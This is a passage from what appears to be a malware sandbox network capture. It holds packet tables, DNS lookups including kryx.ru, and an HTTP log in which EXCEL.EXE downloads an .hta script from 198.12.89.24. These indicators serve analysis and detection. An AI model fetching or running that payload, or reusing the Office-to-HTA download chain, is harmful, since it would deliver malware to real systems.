                      Mar 15, 2025 08:45:19.807492018 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.807518005 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.807545900 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.811534882 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.811556101 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.811608076 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.811614990 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.811649084 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.811906099 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.811928034 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.811964989 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.811971903 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.811994076 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.812014103 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.812397957 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.812421083 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.812462091 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.812469006 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.812493086 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.812509060 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.812622070 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.812642097 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.812685966 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.812693119 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.812711000 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.812721968 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.813074112 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.813091040 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.813124895 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.813131094 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.813148975 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.813179970 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.813350916 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.813370943 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.813405037 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.813410997 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.813433886 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.813446999 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.896028996 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.896054983 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.896099091 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.896115065 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.896126032 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.896127939 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.896148920 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.896173000 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.896178961 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.896189928 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.896215916 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.900320053 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.900340080 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.900377989 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.900384903 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.900401115 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.900414944 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.900511026 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.900525093 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.900551081 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.900556087 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.900597095 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.900597095 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.900779009 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.900791883 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.900846958 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.900854111 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.900950909 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.901032925 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.901046038 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.901073933 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.901079893 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.901094913 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.901107073 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.901243925 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.901258945 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.901305914 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.901312113 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.901496887 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.901545048 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.901560068 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.901604891 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.901609898 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.901647091 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.984621048 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.984695911 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.984724998 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.984761000 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.984781027 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.984802008 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.984852076 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.984863997 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.984882116 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.984918118 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.984942913 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.988996983 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.989047050 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.989073038 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.989093065 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.989115000 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.989209890 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.989232063 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.989259005 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.989290953 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.989303112 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.989319086 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.989331007 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.989353895 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.989372969 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.989583015 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.989639044 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.989643097 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.989664078 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.989691019 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.989706039 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.989815950 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.989860058 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.989886999 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.989893913 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.989917994 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.989933968 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.990082026 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.990125895 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.990144014 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.990154028 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.990175962 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.990190983 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.990286112 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.990325928 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.990353107 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.990359068 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:19.990386963 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:19.990403891 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.073244095 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.073296070 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.073327065 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.073345900 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.073381901 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.073390961 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.073401928 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.073445082 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.073466063 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.073476076 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.073493004 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.073519945 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.077502966 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.077548027 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.077577114 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.077584028 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.077610016 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.077630997 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.077698946 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.077738047 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.077764034 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.077770948 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.077792883 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.077819109 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.078125000 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.078169107 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.078195095 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.078201056 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.078223944 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.078248978 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.078397989 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.078444004 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.078463078 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.078470945 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.078495026 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.078504086 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.078680992 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.078718901 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.078746080 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.078754902 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.078789949 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.078902006 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.078944921 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.078975916 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.078982115 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.078995943 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.079027891 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.161678076 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.161729097 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.161760092 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.161772013 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.161797047 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.161818027 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.161886930 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.161926985 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.161952972 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.161959887 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.161984921 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.161998987 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.166042089 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.166085005 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.166111946 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.166137934 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.166147947 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.166187048 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.166553974 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.166594028 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.166630983 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.166640997 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.166672945 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.166687012 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.166712999 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.166750908 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.166770935 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.166779995 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.166807890 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.166821957 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.167160034 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.167205095 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.167224884 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.167233944 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.167246103 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.167279005 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.167352915 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.167408943 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.167409897 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.167437077 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.167470932 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.167491913 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.167563915 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.167604923 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.167623997 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.167632103 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.167653084 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.167789936 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.251498938 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.251554966 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.251585007 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.251637936 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.251652956 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.251771927 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.252243996 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.252285957 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.252326012 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.252332926 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.252353907 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.252362013 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.256364107 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.256453037 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.256535053 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.256617069 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.256735086 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.256773949 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.256809950 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.256819010 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.256840944 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.256865025 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.257235050 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.257276058 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.257303953 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.257311106 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.257332087 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.257353067 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.257478952 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.257544041 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.257574081 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.257642031 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.258003950 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.258045912 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.258097887 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.258105040 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.258135080 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.258156061 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.258189917 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.258352041 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.258352041 CET49701443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:20.258366108 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:20.258439064 CET4434970113.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:25.957479000 CET49703443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:25.957529068 CET4434970313.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:25.957596064 CET49703443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:25.957819939 CET49703443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:25.957835913 CET4434970313.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:25.958287954 CET49704443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:25.958322048 CET4434970413.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:25.958479881 CET49704443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:25.958734989 CET49704443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:25.958751917 CET4434970413.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.592600107 CET4434970413.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.598124981 CET49704443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:26.598151922 CET4434970413.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.599364042 CET49704443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:26.599381924 CET4434970413.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.599654913 CET4434970313.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.600056887 CET49703443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:26.600086927 CET4434970313.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.600857973 CET49703443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:26.600863934 CET4434970313.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.696079969 CET4434970413.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.696149111 CET4434970413.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.696224928 CET49704443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:26.696477890 CET49704443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:26.696496010 CET4434970413.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.696547985 CET49704443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:26.696561098 CET4434970413.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.701083899 CET4434970313.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.701105118 CET4434970313.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.701383114 CET49703443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:26.701395035 CET4434970313.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.701627970 CET4434970313.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.701639891 CET49703443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:26.701661110 CET4434970313.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.701670885 CET49703443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:26.701684952 CET4434970313.107.246.60192.168.2.7
                      Mar 15, 2025 08:45:26.701694012 CET49703443192.168.2.713.107.246.60
                      Mar 15, 2025 08:45:26.701697111 CET4434970313.107.246.60192.168.2.7
                      Mar 15, 2025 08:46:01.984292984 CET4969880192.168.2.7198.12.89.24
                      Mar 15, 2025 08:46:01.989269972 CET8049698198.12.89.24192.168.2.7

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Mar 15, 2025 08:45:02.989859104 CET5940653192.168.2.71.1.1.1
                      Mar 15, 2025 08:45:03.087837934 CET53594061.1.1.1192.168.2.7
                      Mar 15, 2025 08:45:18.419028997 CET5241053192.168.2.71.1.1.1
                      Mar 15, 2025 08:45:18.608872890 CET53524101.1.1.1192.168.2.7

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Mar 15, 2025 08:45:02.989859104 CET192.168.2.71.1.1.10x7bb1Standard query (0)kryx.ruA (IP address)IN (0x0001)false
                      Mar 15, 2025 08:45:18.419028997 CET192.168.2.71.1.1.10xcadeStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Mar 15, 2025 08:44:13.781490088 CET1.1.1.1192.168.2.70x116dNo error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                      Mar 15, 2025 08:44:13.781490088 CET1.1.1.1192.168.2.70x116dNo error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                      Mar 15, 2025 08:44:13.781490088 CET1.1.1.1192.168.2.70x116dNo error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                      Mar 15, 2025 08:44:15.589036942 CET1.1.1.1192.168.2.70x1bf3No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                      Mar 15, 2025 08:44:15.589036942 CET1.1.1.1192.168.2.70x1bf3No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                      Mar 15, 2025 08:45:03.087837934 CET1.1.1.1192.168.2.70x7bb1No error (0)kryx.ru188.225.72.170A (IP address)IN (0x0001)false
                      Mar 15, 2025 08:45:18.608872890 CET1.1.1.1192.168.2.70xcadeNo error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                      Mar 15, 2025 08:45:18.608872890 CET1.1.1.1192.168.2.70xcadeNo error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                      Mar 15, 2025 08:45:18.608872890 CET1.1.1.1192.168.2.70xcadeNo error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                      Mar 15, 2025 08:45:18.608872890 CET1.1.1.1192.168.2.70xcadeNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                      Mar 15, 2025 08:45:18.608872890 CET1.1.1.1192.168.2.70xcadeNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • kryx.ru
                      • otelrules.svc.static.microsoft
                      • 198.12.89.24

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.749698198.12.89.24806544C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                      TimestampBytes transferredDirectionData
                      Mar 15, 2025 08:45:04.327033043 CET266OUTGET /xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Connection: Keep-Alive
                      Host: 198.12.89.24
                      Mar 15, 2025 08:45:04.793327093 CET1236INHTTP/1.1 200 OK
                      Date: Sat, 15 Mar 2025 07:45:04 GMT
                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                      Last-Modified: Fri, 14 Mar 2025 10:54:21 GMT
                      ETag: "778-6304b42c375c3"
                      Accept-Ranges: bytes
                      Content-Length: 1912
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: application/hta
